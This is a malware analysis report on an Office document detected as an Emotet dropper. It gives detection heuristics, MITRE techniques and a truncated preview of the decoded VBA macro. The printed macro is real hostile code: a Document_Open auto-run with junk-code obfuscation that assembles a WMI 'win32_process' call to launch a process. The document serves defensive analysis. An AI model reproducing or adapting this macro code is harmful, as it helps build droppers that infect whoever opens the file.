MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The file is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute automatically. The ClamAV detection and heuristic firings strongly indicate this is an Emotet dropper. The macro likely attempts to download and execute a second-stage payload, a common Emotet behavior, although the script is heavily obfuscated and truncated.
Heuristics 6
-
ClamAV: Doc.Dropper.Emotet-7544766-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emotet-7544766-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7882 bytes |
SHA-256: a4505d9aa099025ee94bf9c9577d50ea15859cdc5bb7868a58be88c1b6831ca1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Vycejmzr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Tbcepkcgnhpwx
End Sub
Attribute VB_Name = "Bimqxgzblyrp"
Attribute VB_Base = "0{BF8C4410-2A64-4A43-B608-1E5B4D4FB943}{A247CEC1-BA27-462C-A0B3-0210073727AD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Flijvcefzoj"
Function Pitxyglphi()
Select Case Ewontzdrytyk
Case 5815
Dwkkvvkxhfhwq = Log(3331)
Iamzmqhgtwnq = 4
Odmxxoop = CSng(trrD0)
Case Kkhoifxibxqsm
Iwproifnwsc = ChrW(RSd)
Tngsyoobjsyny = 472
Zkvrbhpsyxn = Cos(rfTD3Iu)
Case 5
Xkwgkzpnr = 76
Yvozerdpdqnl = Atn(3391)
Tqevhvkxje = Sin(Rdzpbimbtftpo)
End Select
Hnkanudydg = ChrW(wdKeyP)
Select Case Nabshejvqztq
Case 5815
Izpjwccun = Log(3331)
Gistxlbg = 4
Wiqtrgvybqncu = CSng(trrD0)
Case Qefvrtmfp
Rbtoskcgmqzqf = ChrW(RSd)
Vlepdotnh = 472
Kqfjdarvoufm = Cos(rfTD3Iu)
Case 5
Zomqroaz = 76
Baayhyomixzla = Atn(3391)
Yzjhmpygme = Sin(Wprulgihc)
End Select
Drmrfxlv = Hnkanudydg + Bimqxgzblyrp.Banzydziriljk + Bimqxgzblyrp.Svndpgudl
Select Case Aozvwrrckhotr
Case 5815
Ivhqmzaug = Log(3331)
Pwtivkfqxyx = 4
Euqlbhgalz = CSng(trrD0)
Case Wfhyzutbfc
Bmeobcjkcv = ChrW(RSd)
Jpsympdwoaye = 472
Xeergcahjpds = Cos(rfTD3Iu)
Case 5
Qugbtppjbu = 76
Yxubnzqjefg = Atn(3391)
Jrcfdvtqtgt = Sin(Kicncjcqdcmib)
End Select
losd = Bimqxgzblyrp.Cvlpoddz.GroupName
Yayiwzyefmtww = Split(Drmrfxlv + LTrim(LTrim(losd)), "//====dsfnnJJJsm388//=")
Select Case Ynahheexq
Case 5815
Qznnixxbsdiac = Log(3331)
Ooofayrhj = 4
Fvdtifgijri = CSng(trrD0)
Case Irvzeqmx
Qpjlcxyrekurb = ChrW(RSd)
Uduuhrfflxjds = 472
Rpowndyuelkz = Cos(rfTD3Iu)
Case 5
Hqpxajmrdjikj = 76
Sugoltfcekv = Atn(3391)
Qjxrbhdgtf = Sin(Gzlfocuaglqe)
End Select
Pitxyglphi = Dkmsucacshca + Join(Yayiwzyefmtww, "") + Dkmsucacshca
Select Case Zncvcdsoiodt
Case 5815
Pvpsbnpj = Log(3331)
Cpbourmj = 4
Rdlqgnbqw = CSng(trrD0)
Case Ckpudlbodgqaa
Cetqbuzklm = ChrW(RSd)
Lnlymjeaemuqg = 472
Qabdkwulxwgc = Cos(rfTD3Iu)
Case 5
Aditmqar = 76
Qwthpkcj = Atn(3391)
Ijkizcqcocghc = Sin(Imxuvvzt)
End Select
End Function
Function Tbcepkcgnhpwx()
d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Bimqxgzblyrp.Fmgsnpdkhc + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"
Select Case Utqslcezgnb
Case 5815
Qqvtlseeyqmh = Log(3331)
Zahsqrozoswd = 4
Rtyyyjsu = CSng(trrD0)
Case Qfgjwcdkbhfyy
Seqbdxifcm = ChrW(RSd)
Ojbcfblclkfd = 472
Lcfwtvenfeb = Cos(rfTD3Iu)
Case 5
Yiaewqjpbafax = 76
Ziynopmfzftj = Atn(3391)
Dwamfmtl = Sin(Mczjczwvjm)
End Select
E = "//====dsfnnJJJsm388//="
Select Case Kuffqeeauqol
Case 5815
Yqhqqkta = Log(3331)
Iukdcjkfyb = 4
Mltvvokqfqgn = CSng(trrD0)
Case Misrbkwswvt
Lginjvfdwwupe = ChrW(RSd)
Hsnxknwbn = 472
Uwupycuq =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.